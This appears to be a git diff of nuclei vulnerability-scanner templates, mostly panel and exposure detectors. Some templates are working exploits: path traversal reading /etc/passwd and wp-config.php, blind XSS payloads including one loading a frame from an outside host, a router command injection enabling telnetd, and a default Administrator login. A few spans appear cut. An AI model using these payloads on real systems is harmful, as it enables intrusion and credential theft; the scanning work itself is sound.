- "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cognito.yaml b/nuclei-templates/Other/aws-cognito-638.yaml similarity index 100% rename from nuclei-templates/Other/aws-cognito.yaml rename to nuclei-templates/Other/aws-cognito-638.yaml diff --git a/nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml b/nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml similarity index 100% rename from nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml rename to nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml diff --git a/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml b/nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml similarity index 100% rename from nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml rename to nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml diff --git a/nuclei-templates/Other/aws-object-listing-646.yaml b/nuclei-templates/Other/aws-object-listing-648.yaml similarity index 100% rename from nuclei-templates/Other/aws-object-listing-646.yaml rename to nuclei-templates/Other/aws-object-listing-648.yaml diff --git a/nuclei-templates/Other/aws-opensearch-login-649.yaml b/nuclei-templates/Other/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..14f111d73a --- /dev/null +++ b/nuclei-templates/Other/aws-opensearch-login-649.yaml @@ -0,0 +1,25 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/nuclei-templates/Other/aws-opensearch-login-650.yaml b/nuclei-templates/Other/aws-opensearch-login-650.yaml deleted file mode 100644 index b7bc22b30a..0000000000 --- a/nuclei-templates/Other/aws-opensearch-login-650.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: aws-opensearch-login -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Please login to OpenSearch Dashboards" diff --git a/nuclei-templates/Other/aws-redirect-651.yaml b/nuclei-templates/Other/aws-redirect-651.yaml deleted file mode 100644 index e337d182fd..0000000000 --- a/nuclei-templates/Other/aws-redirect-651.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-redirect - -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: info - reference: - - https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover - -requests: - - method: GET - path: - - '{{BaseURL}}' - - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/nuclei-templates/Other/aws-redirect-654.yaml b/nuclei-templates/Other/aws-redirect-654.yaml new file mode 100644 index 0000000000..1826635a49 --- /dev/null +++ b/nuclei-templates/Other/aws-redirect-654.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws,takeover + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/nuclei-templates/Other/awstats-config-655.yaml b/nuclei-templates/Other/awstats-config-655.yaml new file mode 100644 index 0000000000..9a4cb3cb84 --- /dev/null +++ b/nuclei-templates/Other/awstats-config-655.yaml @@ -0,0 +1,26 @@ +id: awstats-config + +info: + name: AWStats config + author: sheikhrishad + severity: info + tags: config,exposure,awstats + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats/" + - "{{BaseURL}}/awstats.conf" + + matchers: + - type: word + words: + - "AWSTATS CONFIGURE" + - "MAIN SETUP SECTION" + condition: and + + - type: word + words: + - "Index of /awstats" + - "Parent Directory" + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-config-656.yaml b/nuclei-templates/Other/awstats-config-656.yaml deleted file mode 100644 index 8509655870..0000000000 --- a/nuclei-templates/Other/awstats-config-656.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: awstats-config - -info: - name: AWStats config - author: sheikhrishad - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats/" - - "{{BaseURL}}/awstats.conf" - - matchers: - - type: word - words: - - "AWSTATS CONFIGURE" - - "MAIN SETUP SECTION" - condition: and - - - type: word - words: - - "Index of /awstats" - - "Parent Directory" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-script-657.yaml b/nuclei-templates/Other/awstats-script-657.yaml new file mode 100644 index 0000000000..3631c6a328 --- /dev/null +++ b/nuclei-templates/Other/awstats-script-657.yaml @@ -0,0 +1,29 @@ +id: awstats-script + +info: + name: AWStats script + author: sheikhrishad + severity: info + tags: config,exposure,awstats + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats.pl" + - "{{BaseURL}}/logs/awstats.pl" + - "{{BaseURL}}/webstats/awstats.pl" + + matchers-condition: and + matchers: + - type: word + words: + - "Do not remove this line" + + - type: word + part: header + words: + - "application/x-perl" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-script.yaml b/nuclei-templates/Other/awstats-script.yaml deleted file mode 100644 index 9a81b722f3..0000000000 --- a/nuclei-templates/Other/awstats-script.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: awstats-script - -info: - name: AWStats script - author: sheikhrishad - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats.pl" - - "{{BaseURL}}/logs/awstats.pl" - - "{{BaseURL}}/webstats/awstats.pl" - - matchers-condition: and - matchers: - - type: word - words: - - "Do not remove this line" - - - type: word - words: - - "application/x-perl" - part: header - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-webadmin-660.yaml b/nuclei-templates/Other/axigen-webadmin-660.yaml new file mode 100644 index 0000000000..515f319cbe --- /dev/null +++ b/nuclei-templates/Other/axigen-webadmin-660.yaml @@ -0,0 +1,31 @@ +id: axigen-webadmin + +info: + name: Axigen Web Admin Detection + author: dhiyaneshDk + severity: info + description: An Axigen Web Admin panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Axigen WebAdmin' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/axigen-webadmin.yaml b/nuclei-templates/Other/axigen-webadmin.yaml deleted file mode 100644 index 0e54704559..0000000000 --- a/nuclei-templates/Other/axigen-webadmin.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: axigen-webadmin - -info: - name: Axigen Web Admin Detection - author: dhiyaneshDk - severity: info - description: An Axigen Web Admin panel was discovered. - reference: - - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Axigen WebAdmin' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/axigen-webmail-664.yaml b/nuclei-templates/Other/axigen-webmail-664.yaml new file mode 100644 index 0000000000..0b61e4d8bd --- /dev/null +++ b/nuclei-templates/Other/axigen-webmail-664.yaml @@ -0,0 +1,40 @@ +id: axigen-webmail + +info: + name: Axigen WebMail PanelDetection + author: dhiyaneshDk,idealphase + severity: info + description: An Axigen webmail panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebMail" + tags: axigen,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)(Axigen WebMail)' + - 'Axigen Standard Webmail - (.*)' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + part: body + regex: + - '" + script_payload_2: "\"><41707" + script_payload_3: "" + script_payload_4: "" + script_payload_5: "" + script_payload_6: "" + script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" + script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fjs%2Erip%2F1wqkhxuglq%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + blind: + - "{{script_payload_1}}" + - "{{script_payload_2}}" + - "{{script_payload_3}}" + - "{{script_payload_4}}" + - "{{script_payload_5}}" + - "{{script_payload_6}}" + - "{{script_payload_7}}" + - "{{script_payload_8}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{blind}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{script_payload_1}}" + - "{{script_payload_2}}" + - "{{script_payload_3}}" + - "{{script_payload_4}}" + - "{{script_payload_5}}" + - "{{script_payload_6}}" + - "{{script_payload_7}}" + - "{{script_payload_8}}" + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/Other/blogintroduction-wordpress-plugin.yaml b/nuclei-templates/Other/blogintroduction-wordpress-plugin.yaml new file mode 100644 index 0000000000..53aae9268e --- /dev/null +++ b/nuclei-templates/Other/blogintroduction-wordpress-plugin.yaml @@ -0,0 +1,59 @@ +id: blogintroduction-wordpress-plugin + +info: + name: > + Blog Introduction <= 0.3.0 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2896c925-e035-4193-92db-e8a3dd34a0b7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/blogintroduction-wordpress-plugin/" + google-query: inurl:"/wp-content/plugins/blogintroduction-wordpress-plugin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,blogintroduction-wordpress-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blogintroduction-wordpress-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blogintroduction-wordpress-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.3.0') \ No newline at end of file diff --git a/nuclei-templates/Other/blue-iris-login-751.yaml b/nuclei-templates/Other/blue-iris-login-751.yaml deleted file mode 100644 index 783f3c0527..0000000000 --- a/nuclei-templates/Other/blue-iris-login-751.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: blue-iris-login - -info: - name: Blue Iris Login - author: dhiyaneshDK,idealphase - severity: info - description: A Blue Iris login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6814 - - https://blueirissoftware.com/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris - -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Blue Iris Login' - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - 'var bi_version = "(.*)";' diff --git a/nuclei-templates/Other/blue-iris-login-753.yaml b/nuclei-templates/Other/blue-iris-login-753.yaml new file mode 100644 index 0000000000..4a1e4acd08 --- /dev/null +++ b/nuclei-templates/Other/blue-iris-login-753.yaml @@ -0,0 +1,31 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + description: A Blue Iris login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6814 + - https://blueirissoftware.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,blue-iris + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml b/nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml deleted file mode 100644 index d2f7caa672..0000000000 --- a/nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: blue-ocean-excellence-lfi - -info: - name: Blue Ocean Excellence LFI - author: pikpikcu - severity: high - reference: - - https://blog.csdn.net/qq_41901122/article/details/116786883 - tags: blue-ocean,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "toor:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/blue-ocean-excellence-lfi.yaml b/nuclei-templates/Other/blue-ocean-excellence-lfi.yaml new file mode 100644 index 0000000000..d6b0d7bc38 --- /dev/null +++ b/nuclei-templates/Other/blue-ocean-excellence-lfi.yaml @@ -0,0 +1,27 @@ +id: blue-ocean-excellence-lfi +info: + name: Blue Ocean Excellence - Local File Inclusion + author: pikpikcu + severity: high + description: Blue Ocean Excellence is vulnerable to local file inclusion. + reference: + - https://blog.csdn.net/qq_41901122/article/details/116786883 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: blue-ocean,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "toor:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/Other/bolt-cms-panel.yaml b/nuclei-templates/Other/bolt-cms-panel-763.yaml similarity index 100% rename from nuclei-templates/Other/bolt-cms-panel.yaml rename to nuclei-templates/Other/bolt-cms-panel-763.yaml diff --git a/nuclei-templates/Other/bower-json-769.yaml b/nuclei-templates/Other/bower-json-769.yaml deleted file mode 100644 index 67f8c44101..0000000000 --- a/nuclei-templates/Other/bower-json-769.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: bower-json - -info: - name: bower.json file disclosure - author: oppsec - severity: info - description: Bower is a package manager which stores packages informations in bower.json file - tags: exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/bower.json" - - matchers-condition: and - matchers: - - type: word - words: - - "name" - - "description" - - "main" - condition: and - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/bower-json-770.yaml b/nuclei-templates/Other/bower-json-770.yaml new file mode 100644 index 0000000000..8d59c7f9bb --- /dev/null +++ b/nuclei-templates/Other/bower-json-770.yaml @@ -0,0 +1,31 @@ +id: bower-json + +info: + name: bower.json file disclosure + author: oppsec + severity: info + description: Bower is a package manager which stores package information in the bower.json file + tags: exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/bower.json" + + matchers-condition: and + matchers: + - type: word + words: + - "name" + - "description" + - "main" + condition: and + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/branch-key-774.yaml b/nuclei-templates/Other/branch-key.yaml similarity index 100% rename from nuclei-templates/Other/branch-key-774.yaml rename to nuclei-templates/Other/branch-key.yaml diff --git a/nuclei-templates/Other/brandfolder-lfi-776.yaml b/nuclei-templates/Other/brandfolder-lfi-776.yaml new file mode 100644 index 0000000000..2cb1f03bf0 --- /dev/null +++ b/nuclei-templates/Other/brandfolder-lfi-776.yaml @@ -0,0 +1,29 @@ +id: brandfolder-lfi + +info: + name: Wordpress brandfolder plugin - RFI & LFI + author: 0x_Akoko + severity: high + description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. + reference: + - https://www.exploit-db.com/exploits/39591 + - https://cxsecurity.com/issue/WLB-2016030120 + tags: wordpress,wp-plugin,lfi,rfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/brandfolder-lfi-778.yaml b/nuclei-templates/Other/brandfolder-lfi-778.yaml deleted file mode 100644 index bf52f7690b..0000000000 --- a/nuclei-templates/Other/brandfolder-lfi-778.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: brandfolder-lfi -info: - name: Wordpress Brandfolder - Remote/Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. - reference: - - https://www.exploit-db.com/exploits/39591 - - https://cxsecurity.com/issue/WLB-2016030120 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,rfi -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/brandfolder-open-redirect-782.yaml b/nuclei-templates/Other/brandfolder-open-redirect-782.yaml new file mode 100644 index 0000000000..e471dd75b4 --- /dev/null +++ b/nuclei-templates/Other/brandfolder-open-redirect-782.yaml @@ -0,0 +1,18 @@ +id: brandfolder-open-redirect +info: + name: WordPress Brandfolder Plugin Open Redirect + author: 0x_Akoko + severity: low + description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. + reference: + - https://www.exploit-db.com/exploits/39591 + tags: wordpress,wp-plugin,lfi,rfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + part: header diff --git a/nuclei-templates/Other/brandfolder-open-redirect.yaml b/nuclei-templates/Other/brandfolder-open-redirect.yaml deleted file mode 100644 index 7c050c1701..0000000000 --- a/nuclei-templates/Other/brandfolder-open-redirect.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: brandfolder-open-redirect - -info: - name: WordPress Brandfolder - Remote/Local File Inclusion - author: 0x_Akoko - severity: low - description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. - reference: - - https://www.exploit-db.com/exploits/39591 - tags: wordpress,wp-plugin,lfi,rfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/brightcove-takeover.yaml b/nuclei-templates/Other/brightcove-takeover-785.yaml similarity index 100% rename from nuclei-templates/Other/brightcove-takeover.yaml rename to nuclei-templates/Other/brightcove-takeover-785.yaml diff --git a/nuclei-templates/Other/brother-printer-detect-789.yaml b/nuclei-templates/Other/brother-printer-detect-789.yaml new file mode 100644 index 0000000000..941f6faff9 --- /dev/null +++ b/nuclei-templates/Other/brother-printer-detect-789.yaml @@ -0,0 +1,31 @@ +id: brother-printer-detect + +info: + name: Brother Printer + + author: pussycat0x + + severity: low + + reference: https://www.exploit-db.com/ghdb/6889 + + tags: iot,printer,tech + +requests: + - method: GET + + path: + - "{{BaseURL}}/general/status.html" + + matchers-condition: and + + matchers: + - type: word + + words: + - "Brother Industries" + + - type: status + + status: + - 200 diff --git a/nuclei-templates/Other/brother-printer-detect-790.yaml b/nuclei-templates/Other/brother-printer-detect-790.yaml deleted file mode 100644 index ecf0f021fc..0000000000 --- a/nuclei-templates/Other/brother-printer-detect-790.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: brother-printer-detect - -info: - name: Brother Printer - author: pussycat0x - severity: low - reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/general/status.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/brother-unauthorized-access-792.yaml b/nuclei-templates/Other/brother-unauthorized-access-792.yaml deleted file mode 100644 index f0e73f3ef8..0000000000 --- a/nuclei-templates/Other/brother-unauthorized-access-792.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: brother-unauthorized-access - -info: - name: Brother Printer - author: pussycat0x - severity: medium - reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/net/net/net.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - "Network Status" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/brother-unauthorized-access.yaml b/nuclei-templates/Other/brother-unauthorized-access.yaml new file mode 100644 index 0000000000..f3e5d8283c --- /dev/null +++ b/nuclei-templates/Other/brother-unauthorized-access.yaml @@ -0,0 +1,25 @@ +id: brother-unauthorized-access + +info: + name: Brother Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6889 + tags: iot,printer,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/net/net/net.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Brother Industries" + - "Network Status" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/browserless-debugger-794.yaml b/nuclei-templates/Other/browserless-debugger-795.yaml similarity index 100% rename from nuclei-templates/Other/browserless-debugger-794.yaml rename to nuclei-templates/Other/browserless-debugger-795.yaml diff --git a/nuclei-templates/Other/buddy-panel-796.yaml b/nuclei-templates/Other/buddy-panel-796.yaml deleted file mode 100644 index bfe3720b01..0000000000 --- a/nuclei-templates/Other/buddy-panel-796.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: buddy-panel -info: - name: Buddy Panel Detect - author: thardt-praetorian - severity: info - reference: - - https://buddy.works - metadata: - shodan-query: http.favicon.hash:-850502287 - tags: panel,buddy,cicd -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Buddy App' - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/buddy-panel.yaml b/nuclei-templates/Other/buddy-panel.yaml new file mode 100644 index 0000000000..b227e65241 --- /dev/null +++ b/nuclei-templates/Other/buddy-panel.yaml @@ -0,0 +1,30 @@ +id: buddy-panel + +info: + name: Buddy Panel Detect + author: thardt-praetorian + severity: info + reference: https://buddy.works + metadata: + shodan-query: http.favicon.hash:-850502287 + tags: panel,buddy,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Buddy App' + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/buffalo-config-injection-800.yaml b/nuclei-templates/Other/buffalo-config-injection-800.yaml new file mode 100644 index 0000000000..ba678d6928 --- /dev/null +++ b/nuclei-templates/Other/buffalo-config-injection-800.yaml @@ -0,0 +1,34 @@ +id: buffalo-config-injection + +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: gy741 + severity: critical + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + reference: + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: buffalo,firmware,iot + +requests: + - raw: + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Connection: close + + action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A + ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/Success.htm" + + - type: status + status: + - 302 \ No newline at end of file diff --git a/nuclei-templates/Other/buffalo-config-injection.yaml b/nuclei-templates/Other/buffalo-config-injection.yaml deleted file mode 100644 index d02f4693f2..0000000000 --- a/nuclei-templates/Other/buffalo-config-injection.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: buffalo-config-injection -info: - name: Buffalo WSR-2533DHPL2 - Configuration File Injection - author: gy741 - severity: critical - description: | - Buffalo WSR-2533DHPL2 firmware version <=1.02 and WSR-2533DHP3 firmware version <=1.24 do not properly sanitize user input via their web interfaces. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. - reference: - - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - - https://www.tenable.com/security/research/tra-2021-13 - - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - classification: - cve-id: CVE-2021-20090 - tags: buffalo,firmware,iot -requests: - - raw: - - | - POST /images/..%2fapply_abstract.cgi HTTP/1.1 - Host: {{Hostname}} - Connection: close - - action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A - ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/Success.htm" - - type: status - status: - - 302 - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/Other/buildbot-panel.yaml b/nuclei-templates/Other/buildbot-panel.yaml index 894c357bbc..c7713e24e5 100644 --- a/nuclei-templates/Other/buildbot-panel.yaml +++ b/nuclei-templates/Other/buildbot-panel.yaml @@ -1,25 +1,28 @@ id: buildbot-panel info: - name: Buildbot Panel + name: Buildbot Panel Detect author: thardt-praetorian severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22BuildBot%22 + reference: https://buildbot.net + metadata: + shodan-query: http.title:"BuildBot" tags: panel,buildbot,cicd requests: - method: GET - redirects: true - max-redirects: 5 path: - - '{{BaseURL}}/' + - '{{BaseURL}}' + redirects: true + max-redirects: 2 matchers-condition: and matchers: - - type: word - words: - - '>Buildbot' + - type: regex + part: body + regex: + - 'Buildbot' - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/nuclei-templates/Other/bullwark-momentum-lfi-807.yaml b/nuclei-templates/Other/bullwark-momentum-lfi.yaml similarity index 100% rename from nuclei-templates/Other/bullwark-momentum-lfi-807.yaml rename to nuclei-templates/Other/bullwark-momentum-lfi.yaml diff --git a/nuclei-templates/Other/businessintelligence-default-login-814.yaml b/nuclei-templates/Other/businessintelligence-default-login-814.yaml deleted file mode 100644 index da9a4e3f80..0000000000 --- a/nuclei-templates/Other/businessintelligence-default-login-814.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: oracle-business-intelligence-login -info: - name: Oracle Business Intelligence Default Login - author: milo2012 - severity: high - tags: oracle,default-login -requests: - - raw: - - | - POST /xmlpserver/services/XMLPService HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml - SOAPAction: "" - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - - - - - - {{username}} - {{password}} - bi - - - - payloads: - username: - - Administrator - password: - - Administrator - attack: pitchfork - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'createSessionReturn' - part: body diff --git a/nuclei-templates/Other/businessintelligence-default-login.yaml b/nuclei-templates/Other/businessintelligence-default-login.yaml new file mode 100644 index 0000000000..87fad6bf56 --- /dev/null +++ b/nuclei-templates/Other/businessintelligence-default-login.yaml @@ -0,0 +1,50 @@ +id: 